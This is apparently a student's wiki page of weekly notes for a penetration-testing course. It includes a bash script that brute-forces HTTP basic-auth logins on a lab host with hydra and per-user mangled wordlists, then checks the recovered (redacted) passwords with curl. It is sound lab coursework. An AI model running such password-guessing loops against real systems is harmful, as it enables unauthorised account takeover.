Working Notes: SEC335: Week 5 - eliminmax/cncs-journal GitHub Wiki
Did Lab 5.1, Assignment 5.1, and Reading 5.1
The hardest part for me was coming up with a way to display the results of using hydra neatly. I wound up writing the following script:
#!/usr/bin/env bash
# took me a bit of work to figure out a way to shorten hydra's output, and by piping it, it loses its color.
# The following filters out all lines that don't announce that a match was found, and adds the color back
# The sed expression use what I believe is a bashism: while '\e' is evaluated literally as a backslash and
# a lowercase e, $'\e' evaluates as an escape character. That means that some backslashes must be doubled
# to work properly, but it still highlights properly.
# The first sed expression deletes lines that do not contain the pattern 'password:'.
# The second encloses characters within square brackets with an escape cold to output them in bold green.
# The third does something similar, but for sequences of non-space characters following the characters ': '.
for user in bilbo frodo pippin samwise; do
hydra -l "$user" -P "mangled_wordlist_$user" http-get://10.0.5.21/admin/ 2>/dev/null |\
sed -e '/password:/!d' \
-e $'s/\[\([^]]*\)/[\e[1;32m\\1\e[m/g' \
-e $'s/: \([^ ]*\)/: \e[1;32m\\1\e[m/g'
done
# I already had the answers when writing this, but I couldn't fit them cleanly together in a screenshot.
# The following loop tests that the passwords worked. The fakeuser:fakepass is there to demonstrate that
# it properly reports failure.
for cred in bilbo:โโโโโโโโโโโโ frodo:โโโโโโโโโโโโ pippin:โโโโโโโโโโโโ samwise:โโโโโโโโโโโโ fakeuser:fakepass; do
if curl -sf -u $cred http://10.0.5.21/admin/ &>/dev/null ; then
printf 'Username \e[1;38;5;46m%s\e[m with password \e[1;38;5;46m%s\e[m worked!\n' $(echo "$cred" | tr : ' ')
else
printf 'Username \e[1;38;5;124m%s\e[m with password \e[1;38;5;124m%s\e[m failed!\n' $(echo "$cred" | tr : ' ') >&2
fi
doneI've replaced the 9-12 character passwords with 12 full-block characters. I'm writing this page in Neovim, and the way that I did that was typing the following in normal mode: 12i<ctrl+k>FB<esc>.
In insert mode, entering ctrl+k followed by 2 characters inserts another character that might not be easily typed. The available combinations can be listed with :digraphs. I recently learned about that and think it's neat, and useful to redact the passwords in case any classmates hope to get the answer off of my wiki.
As for the use of cewl, rsmangler, hydra itself, I already have those notes from last semester. I did, however, adjust the formatting and rename the file they are stored in, and add a bit to the section on hydra. The notes can be found at Penetration Testing: Password Guessing and Cracking ยง Password Guessing
I actually did this at the very beginning of the semester, sort of. Instead of changing the root password, I renamed the default champuser account to eliminmax, using the process I described years ago
in the Linux: Change Account Username page on this very wiki, then searching the file system for any file containing the string champuser and determining whether to replace it or not - if it referred to the /home/champuser directory or dealt with user or group permissions like /etc/subuid, then I replaced or deleted it, depending on what was appropriate. I figured that, worst-case scenario, I'd need to go back into single-user mode to fix things. It worked out fine.
Not much to say - I had to find a password from a password list like the notorious rockyou.txt, and show Google searches for its md5 and sha256 sums.